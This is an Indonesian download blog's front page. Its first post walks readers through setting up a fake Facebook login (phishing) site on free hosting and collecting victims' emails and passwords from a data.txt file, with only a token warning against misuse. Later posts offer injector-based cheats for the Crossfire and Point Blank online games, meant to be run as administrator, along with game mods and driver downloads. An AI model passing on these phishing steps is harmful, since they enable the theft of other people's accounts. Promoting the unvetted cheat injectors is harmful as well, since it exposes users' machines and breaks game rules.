Headlines News :

Recent Post

Cara buat Fake login Facebook / Phising Facebook

Muhammad Bagus Aldin Firmansyah on Rabu, 30 April 2014 | 05.01

 

Selamat Malam, kali ini saya akan share cara bikin phising facebook. Phising yang akan saya bagian kali ini adalah Facebook, yang dimana phising ini sangat populer dan di cari-cari di facebook untuk mengelabui korbannya. Namun ingat gunakanlah phising ini dengan sebaik-baiknya dan semoga ini hanya dibuat sebagai pembelajaran saja atau iseng belaka kepada teman, sahabat, kaka.

Untuk mendownload phising facebook, silahkan klik disini
Phising-Facebook (4 kB)
Dan kami ingatkan sekali lagi untuk tidak menyalah gunakan phising ini.

Lalu bagaimana cara menginstallnya ke hosting ??
Cara menginstallnya cukup mudah sekali hanya dengan beberapa kali klik saja.
1. Masuk ke Hosting anda, jika belum punya hosting anda bisa mendaftar di sini
2. Klik Kontrol Panel lalu klik kelola untuk di jadikan situs phising, jika anda belum mempunyai domain/situs silahkan klik "Create New Domain" dan pilih plan gratis dan ikuti langkah selanjutnya.
3. Terakhir kalian akan pergi ke sebuah dashboard/cpanel dan yang harus anda lakukan adalah tinggal mengupload saja di File manager 1, script tadi saya berikan diatas pada "Import Website". Selesai!!

Situs Phising anda sudah jadi sekarang dan sebelum menengok ke situs phising anda.

Bagaimana Cara Melihat Email dan Password Korban?
Caranya anda cukup mengunjungi http://domain.com/data.txt.

Sekian dan trimakasih wkwk :D


Download Super Fast Shutdown & Reboot 2014

Muhammad Bagus Aldin Firmansyah on Senin, 24 Maret 2014 | 07.08


Hallo! Apa kabar kalian semua,disini saya akan membagikan sebuah program Sederhana Untuk Mematikan komputer dengan cepat 10 detik sudah mati tuh komputer tinggal kubur  .
SUPER FAST SHUTDOWN & REBOOT kegunaanya adalah :

  • Mematikan & Merestart Komputer/Laptop Dengan Cepat
  • Cukup Ringan Dan tidak memakan banyak RAM
Bagi anda yang sudah tidak sabar Silahkan Download : 
  • http://www.datafilehost.com/d/ce5a4fcc
Password : http://bloggershare-11.blogspot.com/


Download Gta Extreme Indonesia Full MOD

Muhammad Bagus Aldin Firmansyah on Selasa, 11 Februari 2014 | 01.02

GTA Sanandreas

Udah pada tau kan game Grand Theft Auto Sanandreas atau sering disingkat menjadi GTA Sanandreas ? pasti sudah tau donk,, game ini menurut saya game paling seru di Playstation 2, dan hadir untuk komputer, dan kali ini saya akan share game Grand Theft Auto Sanandreas Versi Full Mod...., Langsung aja disedot ....

List Modnya : 


-Cleo 4
-Skin Selector
-imfx Lensflare
-SASR v2 (SA Sky Revolution)
-skin Tarantula, Assasins, Jeremy stone,dll
-auto driver
-Weapon selector
-Vehicle Spawner
-Mod Becak
-Mod gang grove street tertangkap di balai kota
-Weapon remover
-Indonesian pack v3.00 (tahap uji)
-all weapon moded (minigun, kriss, amok, cheytac, aug, pedang, dll)
-Streamfix
-Behind Space into realities (mod pohon detail)
-Los santos to iv map (detail map LS)
-IV Effect overdose v1.5
-detail road pack (ganti texture jalan LS,SF,LV)
-Puluhan mod mobil : Flatout Trasher, Ambulance hummer, FBI Truck, Lamborghini A, Monster, Death race, Police car, Detail Patriot, Abrams tank COD MW, dll
-mod pesawat : Hunter heli russia detail, A-10 with minigun, army maverrick, dll
-vortex army, kapal tempur
-Detailed radar mod
-Burger king
-SPBU Mushola v2
-Vinewood sign to Indonesia
-Theather JKT48
-Meme mode
-Bus sinar jaya
-Bus Trans jakarta
-Kereta api Bangunkarta
-Skin Frost, Cpt. Price, US Army (no skin selector)
-Singapore airlines at-400
-billboard lucu indonesia
-Wall Spongebob
-real handling v1
-Truck Pertamina 
-New Interior of CJ house
-PS3 console (game di rumah CJ)
-Uang indonesia
-Bank BRI
-Satria FU
-Nokia Lumia520
-Slow Motion
-Sunshine autos show
-Indonesian Pack v3.00 (Final)
-Point Blank Kill Effect
-Police LV Lamborghini
-new groove stree
-sweeper airpot
-Personalized FPD 4.4
-Missile Launcher Truck
-Military Quad bike
-Detailed Taxi
-BMW 535i
-Nissan sil80
-Helikopter POLRI
-Ambulance Mobil Jenazah
-Bobcat Offroad edition
-New Improved Sultan
-Supra X 125 cc
-LPG 3KG
-Ferari F40
-Sholat Mod
-Detail Army Truck
-Ayam Kampung
-Soap COD MW3 (not skin selector)
-Male01 HD
-New Skin Police LS
-Mitsubishi lancer evolution VIII
-gaz 2975 tiger
-Baju Batik (Zip - Sky Blue)
-Cornor Assasin Creed III
-gta IV scratches style
-ifruit (HaPe)
-Angkot
-Mabes Polri
-Polisi Indonesia LS
-Polisi Indonesia LV (Lamborghini)
-Trans TV Newsvan
-Baygon Semprot
-Reog Ponorogo
-Billboard Indonesia lucu (ku perbanyak lokasinya)
-realtram SF (kereta tengah jalan) 
-Project oblivion palm
-Radio Files (karena banyak yg request, suara radio di mobil)
+MOD Help location, cleo hotkeys, problem solving

Penampakan :

Menu

Mod

SPBU

( Hanya Beberapa SS :D)

Link :
Mediafire
Google Drive
Link Updater :
Google Drive
Link vers 4.1 :
Google Drive
(Mediafire, Size 5,3GB Compressed 869MB)


Download Cheat CF/Crossfire Terbaru 2014 Work

Muhammad Bagus Aldin Firmansyah on Selasa, 04 Februari 2014 | 00.07


Downloads Free
No Password

Fiture File Free CROSSFIRE FREE 2013
  •  Aimbot
  •  AimKey
  •  Visible Check
  •  Aim Distance
  •  Esp mode
  •  Esp Name
  •  Esp Health
  •  Esp Bar
  •  Esp Rank
  •  2D & 3D Boxes
  •  Esp Line
  •  Distance Line
  •  Esp Bomp
  •  D3D mode
  •  Wall mode / wh
  •  Show Ghost
  •  Glass Wall
  •  Point Wall
  •  White Player
  •  White Wall
  •  Remove Wall
  •  Memory mode
  •  Super Jump
  •  Move Speed
  •  Close & Open Kick
  •  Anti Fall Damage
  •  Anti Grenade Bomp
  •  Anti Flash Bomp
  •  Anti Smoke Bomp
  •  Anti Weapons Weight
  •  Anti Weapons Recoil
  •  Anti Weapon Reload
  •  Anti AWM Delay
  •  Onehit Sniper
  •  Onehit ZMode
  •  Onehit AIMode
  •  OneHit Knife
  •  OneHit Kills
  •  Walk Through Wall
  •  Shoot Through Wall
  •  Long Knife Attack
  •  Fast Knife Attack
  •  Weapons mode
  •  Buy Item Admin
  •  Game Type
  •  Distance Defuse C4
  •   Fast Defuse C4
  •  Fast Place C4
  •   Save Current Map
  •  Load Original Map


Features:
  •  D3D menu free Check Di D3D: Insert On/off
  • On Aplication: ->
  • Off Aplication: <-
Tutorial :
  • Download Chet
  • Extraxt File - Klik kanan Extrxt here
  • Buka Chet
  • Activation Chet nya
  • Kalau sudah Tulisan Activation
  • Baru Buka Crossfire Nya
  • Star Crossfire

Read it!
-Windows 7 : Gunakan Klik Kanan - Run As administrator saat membuka file free dan Crossfirenya!
-Jika memakai activation tidak bisa ,silahkan aktifkan secara manual dengan menekan tombol active di tengah injectornya


Credit
HA*LIB
CFPRO
VINACF
Synboz


Download Cheat Point Blank Terbaru 2014 Work

Muhammad Bagus Aldin Firmansyah on Senin, 03 Februari 2014 | 23.37




Download File Gratis
No Password


==========
Fiture Simple
==========
  • Real Anti Banned ID = Auto On
  • Wallhek = INSERT On/Off ( Ketika di dalam pertandingan / saat sudah main )
  • Cit Pangkat = F5 On Tero Mode | F6 On Police Mode | F7 OFF  ( Baru )
  • Change Name = F5 On Tero Mode | F6 On Police Mode | F7 OFF  ( Baru )
  • GM Mode = F5 On Tero Mode | F6 On Police Mode | F7 OFF  ( Baru )
  • Yellow Chat GM = F5 On Tero Mode | F6 On Police Mode | F7 OFF  ( Baru )
  • Skill = F10 On Tero Mode | F11 On Police Mode | F12 OFF
  • No Respawn Time = F10 On Tero Mode | F11 On Police Mode | F12 OFF
  • Quick Change = F10 On Tero Mode | F11 On Police Mode | F12 OFF
  • Skill = F10 On Tero Mode | F11 On Police Mode | F12 OFF
  • HP Up == F10 On Tero Mode | F11 On Police Mode | F12 OFF


=======
Tutorial  :
=======
    • Donwnload Chet
    • Extraxt File - Klik kanan Extraxt here
    • Buka file gratis PB / Chet PB Yang Barusan Agan Download
    • Klik Ok
    • Muncul injectnya
    • Buka PBLauncher
    • Baru STAR PointBlank Launchernya
    • Happy gamming

    *Note : Buat Windows 7 : WAJIB BACA ! <<
    • Saat Buka PB - Pilih klik kanan Run As-Administrator
    • Saat Buka cit Juga sama , Pilih klik kanan Run As-Administrator


    Download Driver Mobile Partner Untuk Windows 8

    Muhammad Bagus Aldin Firmansyah on Kamis, 26 Desember 2013 | 23.32

    Download Driver Mobile Partner Untuk Windows 8

    Driver Mobile Partner 23.009.09.01.983 versi terbaru dengan sms dan fasilitas buku telepon telah dirilis untuk pengguna Windows 8. Pengembang Windows 8 juga membuat software-nya lainnya agar kompatibel dengan sistem operasi Windows 8. Huawei Corporation juga merilis versi terbarunya dari Huawei Mobile Partner 23.009.09.01.983 untuk pengguna Windows 8. Sekarang pengguna Windows 8 dapat menikmati USB 3G Modem Huawei tanpa gangguan dengan Huawei Mobile Partner 23.009.09.01.983 di Windows 8 juga .......


    Tools SSH Dan Tutorial Menggunakan SSH

    Tools SSH Dan Tutorial Menggunakan SSH

    SSH adalah aplikasi pengganti remote login seperti telnet, rsh, dan rlogin, yang jauh lebih aman. Dikembangkan pertamakali oleh OpenBSD project dan kemudian versi rilis p (port) di-manage oleh team porting ke sistem operasi lainnya, termasuk sistem operasi Linux. Fungsi utama aplikasi ini adalah untuk mengakses mesin secara remote.

    Bentuk akses remote yang bisa diperoleh adalah akses pada mode teks maupun mode grafis/X apabila konfigurasinya mengijinkan. scp yang merupakan anggota keluarga ssh adalah aplikasi pengganti rcp yang aman, keluarga lainnya adalah sftp yang dapat digunakan sebagai pengganti ftp.

    Akhir - akhir ini SSH memang sangat hangat diperbincangkan para pengguna internet . dengan biaya yang minim namun kita bisa dapatkan kecepatan yang maksimal . untuk menggunakan SSH memerlukan Tools dan Akun SSH itu sendiri . oke berikut ini adalah Tools SSH dan Tutorial Menggunakan SSH .......


     
    █║▌│█│║▌║││█║▌│║▌║█║║▌
    Blogger share #11 © 2012 | Some Rights Reserved
    HOMETERMSPRIVACY POLICYTOP ▲
    Powered by Blogger